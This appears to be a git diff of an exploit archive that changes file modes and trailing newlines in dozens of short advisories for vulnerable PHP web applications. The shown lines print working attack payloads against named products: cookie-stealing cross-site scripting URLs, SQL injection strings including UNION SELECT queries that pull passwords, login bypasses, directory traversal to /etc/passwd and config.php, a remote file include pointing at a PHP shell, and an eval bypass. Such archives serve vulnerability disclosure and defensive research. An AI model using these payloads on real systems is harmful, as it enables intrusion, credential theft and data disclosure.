5ad106147..4fc423459 --- a/platforms/php/webapps/26080.txt +++ b/platforms/php/webapps/26080.txt @@ -4,4 +4,4 @@ Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../' relative to the Web application's root path. Exploitation of this vulnerability could lead to a loss of confidentiality. -http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php \ No newline at end of file +http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php \ No newline at end of file diff --git a/platforms/php/webapps/26081.txt b/platforms/php/webapps/26081.txt old mode 100755 new mode 100644 index 844891c46..302d5c470 --- a/platforms/php/webapps/26081.txt +++ b/platforms/php/webapps/26081.txt @@ -6,4 +6,4 @@ An attacker may leverage any of these issues to have arbitrary script code execu http://www.example.com/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor http://www.example.com/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor -http://www.example.com/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE] \ No newline at end of file +http://www.example.com/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/26082.txt b/platforms/php/webapps/26082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26083.txt b/platforms/php/webapps/26083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26084.txt b/platforms/php/webapps/26084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26085.txt b/platforms/php/webapps/26085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26086.txt b/platforms/php/webapps/26086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26087.txt b/platforms/php/webapps/26087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26088.txt b/platforms/php/webapps/26088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26089.txt b/platforms/php/webapps/26089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2609.txt b/platforms/php/webapps/2609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26090.txt b/platforms/php/webapps/26090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26091.txt b/platforms/php/webapps/26091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26092.txt b/platforms/php/webapps/26092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26093.txt b/platforms/php/webapps/26093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26094.txt b/platforms/php/webapps/26094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26095.txt b/platforms/php/webapps/26095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26096.txt b/platforms/php/webapps/26096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26097.txt b/platforms/php/webapps/26097.txt old mode 100755 new mode 100644 index e10110fd5..2eccca884 --- a/platforms/php/webapps/26097.txt +++ b/platforms/php/webapps/26097.txt @@ -4,4 +4,4 @@ Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. T An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/newsletter/logs/jnl_records \ No newline at end of file +http://www.example.com/newsletter/logs/jnl_records \ No newline at end of file diff --git a/platforms/php/webapps/26098.txt b/platforms/php/webapps/26098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26099.txt b/platforms/php/webapps/26099.txt old mode 100755 new mode 100644 index 1004cfcca..e351e5bcc --- a/platforms/php/webapps/26099.txt +++ b/platforms/php/webapps/26099.txt @@ -8,4 +8,4 @@ http://[target]/[path]/forum/footer.php?admin="><script>alert(document.cookie)</ http://[target]/[path]/forum/footer.php?admin_mail="><script>alert(document.cookie)</script> http://[target]/[path]/forum/footer.php?back="><script>alert(document.cookie)</script> http://[target]/[path]/footer.php?admin="><script>alert(document.cookie)</script> -http://[target]/[path]/footer.php?admin_mail="><script>alert(document.cookie)</script> \ No newline at end of file +http://[target]/[path]/footer.php?admin_mail="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26102.txt b/platforms/php/webapps/26102.txt old mode 100755 new mode 100644 index be656b0d5..cee261825 --- a/platforms/php/webapps/26102.txt +++ b/platforms/php/webapps/26102.txt @@ -6,4 +6,4 @@ This issue is due to a failure in the application to properly sanitize user-supp Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/messages.php?msg_view=' \ No newline at end of file +http://www.example.com/messages.php?msg_view=' \ No newline at end of file diff --git a/platforms/php/webapps/26103.txt b/platforms/php/webapps/26103.txt old mode 100755 new mode 100644 index 5f0de089e..90d6147b0 --- a/platforms/php/webapps/26103.txt +++ b/platforms/php/webapps/26103.txt @@ -11,4 +11,4 @@ Another script code execution vulnerability may allow an attacker to call arbitr SysCP 1.2.10 and prior versions are prone to these vulnerabilities. The following string is sufficient to bypass the eval() call: -{${phpinfo();}} \ No newline at end of file +{${phpinfo();}} \ No newline at end of file diff --git a/platforms/php/webapps/26104.html b/platforms/php/webapps/26104.html old mode 100755 new mode 100644 index 5c6a77ce0..ec389e291 --- a/platforms/php/webapps/26104.html +++ b/platforms/php/webapps/26104.html @@ -10,4 +10,4 @@ This issue is reported to affect Invision Power Board 1.0.3; other 1.x versions <body> <script>alert('Css found By V[i]RuS');</script> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/26105.html b/platforms/php/webapps/26105.html old mode 100755 new mode 100644 index 9a8ff6d1f..3ed4c5a25 --- a/platforms/php/webapps/26105.html +++ b/platforms/php/webapps/26105.html @@ -8,4 +8,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th <body> <script>alert('VULN');</script> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/26106.txt b/platforms/php/webapps/26106.txt old mode 100755 new mode 100644 index 9f3916fc5..ee502a83f --- a/platforms/php/webapps/26106.txt +++ b/platforms/php/webapps/26106.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following demonstrates login credentials sufficient to exploit this vulnerability: login: ' or isnull(1/0) /* -password: whatever \ No newline at end of file +password: whatever \ No newline at end of file diff --git a/platforms/php/webapps/2611.txt b/platforms/php/webapps/2611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26111.txt b/platforms/php/webapps/26111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26112.txt b/platforms/php/webapps/26112.txt old mode 100755 new mode 100644 index e9351638e..bb0096317 --- a/platforms/php/webapps/26112.txt +++ b/platforms/php/webapps/26112.txt @@ -4,4 +4,4 @@ Calendar Express is prone to multiple SQL-injection vulnerabilities because the A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/calendarexpress/login.php?cid=' \ No newline at end of file +http://www.example.com/calendarexpress/login.php?cid=' \ No newline at end of file diff --git a/platforms/php/webapps/26113.txt b/platforms/php/webapps/26113.txt old mode 100755 new mode 100644 index 9d3b81dc2..c7fd7289a --- a/platforms/php/webapps/26113.txt +++ b/platforms/php/webapps/26113.txt @@ -4,4 +4,4 @@ Calendar Express is prone to multiple SQL-injection vulnerabilities because the A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/calendarexpress/auth.php?cid=' \ No newline at end of file +http://www.example.com/calendarexpress/auth.php?cid=' \ No newline at end of file diff --git a/platforms/php/webapps/26114.txt b/platforms/php/webapps/26114.txt old mode 100755 new mode 100644 index 1e8266b30..b32564cae --- a/platforms/php/webapps/26114.txt +++ b/platforms/php/webapps/26114.txt @@ -4,4 +4,4 @@ Calendar Express is prone to multiple SQL-injection vulnerabilities because the A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/calendarexpress/subscribe.php?cid=' \ No newline at end of file +http://www.example.com/calendarexpress/subscribe.php?cid=' \ No newline at end of file diff --git a/platforms/php/webapps/26115.txt b/platforms/php/webapps/26115.txt old mode 100755 new mode 100644 index c37c41a73..fab657e7b --- a/platforms/php/webapps/26115.txt +++ b/platforms/php/webapps/26115.txt @@ -4,4 +4,4 @@ Calendar Express is prone to a cross-site scripting vulnerability. This issue is An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/calendarexpress/search.php?allwords=<br><script>alert(document.cookie);</script>&cid=0&title=1&desc=1 \ No newline at end of file +http://www.example.com/calendarexpress/search.php?allwords=<br><script>alert(document.cookie);</script>&cid=0&title=1&desc=1 \ No newline at end of file diff --git a/platforms/php/webapps/26116.txt b/platforms/php/webapps/26116.txt old mode 100755 new mode 100644 index ca331e123..780dffda6 --- a/platforms/php/webapps/26116.txt +++ b/platforms/php/webapps/26116.txt @@ -4,4 +4,4 @@ Chipmunk CMS is prone to a cross-site scripting vulnerability. This issue is due An attacker can exploit this vulnerability to inject html and script code into the Web browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials. Other attacks are also possible. -http://www.example.com/[path]/?fontcolor='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/[path]/?fontcolor='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26117.txt b/platforms/php/webapps/26117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26118.txt b/platforms/php/webapps/26118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26119.txt b/platforms/php/webapps/26119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2612.txt b/platforms/php/webapps/2612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26120.txt b/platforms/php/webapps/26120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26121.txt b/platforms/php/webapps/26121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26122.txt b/platforms/php/webapps/26122.txt old mode 100755 new mode 100644 index 89d5e9741..98ec755cf --- a/platforms/php/webapps/26122.txt +++ b/platforms/php/webapps/26122.txt @@ -13,4 +13,4 @@ http://www.example.com/funkboard/register.php?location="><script>alert(document. http://www.example.com/funkboard/register.php?sex="><script>alert(document.cookie)</script> http://www.example.com/funkboard/register.php?interebbies="><script>alert(document.cookie)</script> http://www.example.com/funkboard/register.php?sig=&lt;/textarea&gt;<script>alert(document.cookie)</script> -http://www.example.com/funkboard/register.php?aim="><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/funkboard/register.php?aim="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26124.txt b/platforms/php/webapps/26124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26125.txt b/platforms/php/webapps/26125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26126.txt b/platforms/php/webapps/26126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26127.txt b/platforms/php/webapps/26127.txt old mode 100755 new mode 100644 index f34c5d3eb..b113c4702 --- a/platforms/php/webapps/26127.txt +++ b/platforms/php/webapps/26127.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/news/index.php?action=com&id='SQL_HERE http://www.example.com/cw/index.php?action=details&id='SQL_HERE http://www.example.com/gb/index.php?von='SQL_HERE -http://www.example.com/umfragen/index.php?action=vote&insert='SQL_HERE \ No newline at end of file +http://www.example.com/umfragen/index.php?action=vote&insert='SQL_HERE \ No newline at end of file diff --git a/platforms/php/webapps/2613.txt b/platforms/php/webapps/2613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26132.txt b/platforms/php/webapps/26132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26136.txt b/platforms/php/webapps/26136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2614.txt b/platforms/php/webapps/2614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26140.txt b/platforms/php/webapps/26140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26141.txt b/platforms/php/webapps/26141.txt old mode 100755 new mode 100644 index 12bdc6279..1c4845d36 --- a/platforms/php/webapps/26141.txt +++ b/platforms/php/webapps/26141.txt @@ -4,4 +4,4 @@ ezUpload is affected by multiple remote file include vulnerabilities. These issu An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/ezupload/initialize.php?path=http://www.example.com/phpshell?& \ No newline at end of file +http://www.example.com/ezupload/initialize.php?path=http://www.example.com/phpshell?& \ No newline at end of file diff --git a/platforms/php/webapps/26142.txt b/platforms/php/webapps/26142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26143.txt b/platforms/php/webapps/26143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26144.txt b/platforms/php/webapps/26144.txt old mode 100755 new mode 100644 index f35761858..95de9ead6 --- a/platforms/php/webapps/26144.txt +++ b/platforms/php/webapps/26144.txt @@ -5,4 +5,4 @@ PHPTB is prone to multiple SQL injection vulnerabilities. These issues are due t The consequences of this attack may vary depending on the type of queries that can be influenced, and the implementation of the database. http://www.example.com/PHPTB/index.php?sid=cc3de2fc8c2b357b6a6d46ea8aa92a32&act=profile&mid=-99%20UNION%20SELECT%20null,password,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20tb_members%20WHERE%20user_id=1 -http://www.example.com/PHPTB/index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1 \ No newline at end of file +http://www.example.com/PHPTB/index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1 \ No newline at end of file diff --git a/platforms/php/webapps/26146.txt b/platforms/php/webapps/26146.txt old mode 100755 new mode 100644 index 159169998..6b9eda6ab --- a/platforms/php/webapps/26146.txt +++ b/platforms/php/webapps/26146.txt @@ -4,4 +4,4 @@ VegaDNS is vulnerable to cross-site scripting attacks. This issue is due to a fa An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?VDNS_Sessid=[sessid]&message=[some error msg]<iframe src="http://www.example.com"> \ No newline at end of file +http://www.example.com/index.php?VDNS_Sessid=[sessid]&message=[some error msg]<iframe src="http://www.example.com"> \ No newline at end of file diff --git a/platforms/php/webapps/26147.txt b/platforms/php/webapps/26147.txt old mode 100755 new mode 100644 index d52eee5cd..f33569870 --- a/platforms/php/webapps/26147.txt +++ b/platforms/php/webapps/26147.txt @@ -8,4 +8,4 @@ Reports indicate an attacker can exploit at least one of these vulnerabilities t The following proof of concept demonstrates the vulnerability in admin/index.php: Username: ' or 1=1 /* -Password: blank \ No newline at end of file +Password: blank \ No newline at end of file diff --git a/platforms/php/webapps/26148.txt b/platforms/php/webapps/26148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26149.txt b/platforms/php/webapps/26149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2615.txt b/platforms/php/webapps/2615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26150.txt b/platforms/php/webapps/26150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26153.txt b/platforms/php/webapps/26153.txt old mode 100755 new mode 100644 index 3b8df455b..1555adb6a --- a/platforms/php/webapps/26153.txt +++ b/platforms/php/webapps/26153.txt @@ -5,4 +5,4 @@ My Image Gallery is prone to multiple cross-site scripting vulnerabilities due t An attacker can exploit these vulnerabilities to inject html and script code into the Web browser of an unsuspecting victim. The attacker may then steal cookie-based authentication credentials. Other attacks are also possible. http://www.example.com/[path]/index.php?currDir=./<script>alert(document.cookie)</script> -http://www.example.com/index.php?currDir=./test&pageType=image&image=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?currDir=./test&pageType=image&image=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26155.txt b/platforms/php/webapps/26155.txt old mode 100755 new mode 100644 index 45db1a1e0..529cb68e2 --- a/platforms/php/webapps/26155.txt +++ b/platforms/php/webapps/26155.txt @@ -7,4 +7,4 @@ The consequences of this attack may vary depending on the type of queries that c http://www.example.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min='&max=1 http://www.example.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 -6d90d8e9&key=1&comp=1&min=1&max=' \ No newline at end of file +6d90d8e9&key=1&comp=1&min=1&max=' \ No newline at end of file diff --git a/platforms/php/webapps/26157.txt b/platforms/php/webapps/26157.txt old mode 100755 new mode 100644 index 825746cec..bbdb3117e --- a/platforms/php/webapps/26157.txt +++ b/platforms/php/webapps/26157.txt @@ -4,4 +4,4 @@ ECW Shop is prone to a cross-site scripting vulnerability. This issue is due to This type of exploitation could allow for theft of cookie-based authentication credentials; other attacks are also possible. -http://www.example.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script \ No newline at end of file +http://www.example.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script \ No newline at end of file diff --git a/platforms/php/webapps/26158.txt b/platforms/php/webapps/26158.txt old mode 100755 new mode 100644 index 9272ddf36..783d27eae --- a/platforms/php/webapps/26158.txt +++ b/platforms/php/webapps/26158.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a http://www.example.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1> http://www.example.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i -x=1 \ No newline at end of file +x=1 \ No newline at end of file diff --git a/platforms/php/webapps/26159.txt b/platforms/php/webapps/26159.txt old mode 100755 new mode 100644 index 7e8566778..fe003ad37 --- a/platforms/php/webapps/26159.txt +++ b/platforms/php/webapps/26159.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=' http://www.example.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0 -http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27 \ No newline at end of file +http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27 \ No newline at end of file diff --git a/platforms/php/webapps/2616.php b/platforms/php/webapps/2616.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26160.txt b/platforms/php/webapps/26160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26161.txt b/platforms/php/webapps/26161.txt old mode 100755 new mode 100644 index ee0f561c7..91465960b --- a/platforms/php/webapps/26161.txt +++ b/platforms/php/webapps/26161.txt @@ -7,4 +7,4 @@ An attacker may leverage any of these issues to have arbitrary script code execu http://www.example.com/phpfn/SearchResults.php?Match='><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert(XSS);</script> http://www.example.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert(XSS);</script>&SearchNews=Search&CatID=0 -http://www.example.com/phpfn/SearchResults.php?Match="><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 \ No newline at end of file +http://www.example.com/phpfn/SearchResults.php?Match="><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 \ No newline at end of file diff --git a/platforms/php/webapps/26162.txt b/platforms/php/webapps/26162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26163.txt b/platforms/php/webapps/26163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26164.txt b/platforms/php/webapps/26164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26165.txt b/platforms/php/webapps/26165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26166.txt b/platforms/php/webapps/26166.txt old mode 100755 new mode 100644 index 01a4a2d46..f8145b95d --- a/platforms/php/webapps/26166.txt +++ b/platforms/php/webapps/26166.txt @@ -4,4 +4,4 @@ PHPTB is prone to multiple remote file include vulnerabilities. These issues are An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/classes/tech_o.php?absolutepath=http://www.example.com/ \ No newline at end of file +http://www.example.com/classes/tech_o.php?absolutepath=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/26169.txt b/platforms/php/webapps/26169.txt old mode 100755 new mode 100644 index f9d9ac4a4..dcf93eb1f --- a/platforms/php/webapps/26169.txt +++ b/platforms/php/webapps/26169.txt @@ -8,4 +8,4 @@ http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini%0 http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd%00 http://www.example.com/w-agora/index.php?site=../../../../../../../../etc/passwd http://www.example.com/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini \ No newline at end of file +http://www.example.com/w-agora/index.php?site=../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/2617.php b/platforms/php/webapps/2617.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26170.txt b/platforms/php/webapps/26170.txt old mode 100755 new mode 100644 index 495ba7c83..75b8efb2f --- a/platforms/php/webapps/26170.txt +++ b/platforms/php/webapps/26170.txt @@ -4,4 +4,4 @@ ATutor is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/tour/login.php?course="><script>alert('XSS');</script> \ No newline at end of file +http://www.example.com/tour/login.php?course="><script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/php/webapps/26171.php b/platforms/php/webapps/26171.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26172.txt b/platforms/php/webapps/26172.txt old mode 100755 new mode 100644 index 58ff0bc07..2f2e1c7a8 --- a/platforms/php/webapps/26172.txt +++ b/platforms/php/webapps/26172.txt @@ -17,4 +17,4 @@ B.- Database scanner via variable poisoning http://www.example.com/core/database_api.php?g_db_type=mysql://invaliduser@localhost:3336 http://www.example.com/core/database_api.php?g_db_type=mysql://root@localhost:3336 http://www.example.com/core/database_api.php?g_db_type=informix://localhost:8080 -http://www.example.com/core/database_api.php?g_db_type=mysql://root@10.x.y.z \ No newline at end of file +http://www.example.com/core/database_api.php?g_db_type=mysql://root@10.x.y.z \ No newline at end of file diff --git a/platforms/php/webapps/26176.txt b/platforms/php/webapps/26176.txt old mode 100755 new mode 100644 index 5640f7f8d..e4e5a16d4 --- a/platforms/php/webapps/26176.txt +++ b/platforms/php/webapps/26176.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos It should be noted an attacker must have moderator credentials to access the vulnerable script. http://www.example.com/modcp.php?action=post_del&x='SQL_CODE_HERE -http://www.example.com/modcp.php?action=post_del&x=6&y='SQL_CODE_HERE \ No newline at end of file +http://www.example.com/modcp.php?action=post_del&x=6&y='SQL_CODE_HERE \ No newline at end of file diff --git a/platforms/php/webapps/26177.txt b/platforms/php/webapps/26177.txt old mode 100755 new mode 100644 index c9bbbd36d..7eb939e7e --- a/platforms/php/webapps/26177.txt +++ b/platforms/php/webapps/26177.txt @@ -4,4 +4,4 @@ Land Down Under is prone to multiple SQL-injection vulnerabilities because the a Successful exploitation may allow the attacker to compromise the application, retrieve sensitive information, modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/ldu/links.php?c=links&s=title&w=' \ No newline at end of file +http://www.example.com/ldu/links.php?c=links&s=title&w=' \ No newline at end of file diff --git a/platforms/php/webapps/26178.txt b/platforms/php/webapps/26178.txt old mode 100755 new mode 100644 index cca589e40..e4d78268d --- a/platforms/php/webapps/26178.txt +++ b/platforms/php/webapps/26178.txt @@ -6,4 +6,4 @@ Successful exploitation may allow the attacker to compromise the application, re http://www.example.com/ldu/journal.php?m='&s=username&w=asc http://www.example.com/ldu/journal.php?m='&p=1 -http://www.example.com/ldu/journal.php?m=' \ No newline at end of file +http://www.example.com/ldu/journal.php?m=' \ No newline at end of file diff --git a/platforms/php/webapps/26179.txt b/platforms/php/webapps/26179.txt old mode 100755 new mode 100644 index 8d47b0394..deae52ff2 --- a/platforms/php/webapps/26179.txt +++ b/platforms/php/webapps/26179.txt @@ -6,4 +6,4 @@ Successful exploitation may allow the attacker to compromise the application, re http://www.example.com/ldu/list.php?c=articles&s=title&w=asc&o='&p=1 http://www.example.com/ldu/list.php?c=articles&s=title&w='&o=1&p=1 -http://www.example.com/ldu/list.php?c=articles&s='&w=asc&o=1&p=1 \ No newline at end of file +http://www.example.com/ldu/list.php?c=articles&s='&w=asc&o=1&p=1 \ No newline at end of file diff --git a/platforms/php/webapps/26180.txt b/platforms/php/webapps/26180.txt old mode 100755 new mode 100644 index f00984029..b881d1fe2 --- a/platforms/php/webapps/26180.txt +++ b/platforms/php/webapps/26180.txt @@ -7,4 +7,4 @@ Successful exploitation may allow the attacker to compromise the application, re http://www.example.com/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x=' http://www.example.com/ldu/forums.php?m=topics&q=3&n=' http://www.example.com/ldu/forums.php?m='&q=3&n=last -http://www.example.com/ldu/forums.php?m=topics&s=' \ No newline at end of file +http://www.example.com/ldu/forums.php?m=topics&s=' \ No newline at end of file diff --git a/platforms/php/webapps/26181.txt b/platforms/php/webapps/26181.txt old mode 100755 new mode 100644 index 0113afd31..dd0c2d17b --- a/platforms/php/webapps/26181.txt +++ b/platforms/php/webapps/26181.txt @@ -4,4 +4,4 @@ Land Down Under is prone to multiple cross-site scripting vulnerabilities. These An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script> \ No newline at end of file +http://www.example.com/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script> \ No newline at end of file diff --git a/platforms/php/webapps/26182.txt b/platforms/php/webapps/26182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26183.txt b/platforms/php/webapps/26183.txt old mode 100755 new mode 100644 index 1b5039e0d..fd9cea342 --- a/platforms/php/webapps/26183.txt +++ b/platforms/php/webapps/26183.txt @@ -6,4 +6,4 @@ This vulnerability will allow a malicious user to perform attacks on an unsuspec This can lead to the theft of cookie-based authentication credentials, as well as other attacks. -http://www.example.com/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E \ No newline at end of file +http://www.example.com/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26184.txt b/platforms/php/webapps/26184.txt old mode 100755 new mode 100644 index d1ff2f794..cd4b92438 --- a/platforms/php/webapps/26184.txt +++ b/platforms/php/webapps/26184.txt @@ -4,4 +4,4 @@ PHPKit is prone to multiple SQL injection vulnerabilities. These issues are due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'/* \ No newline at end of file +http://www.example.com/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'/* \ No newline at end of file diff --git a/platforms/php/webapps/26186.txt b/platforms/php/webapps/26186.txt old mode 100755 new mode 100644 index 4c783b7e3..19ebd4cee --- a/platforms/php/webapps/26186.txt +++ b/platforms/php/webapps/26186.txt @@ -8,4 +8,4 @@ http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION% http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2&viewmode=flat&order=0 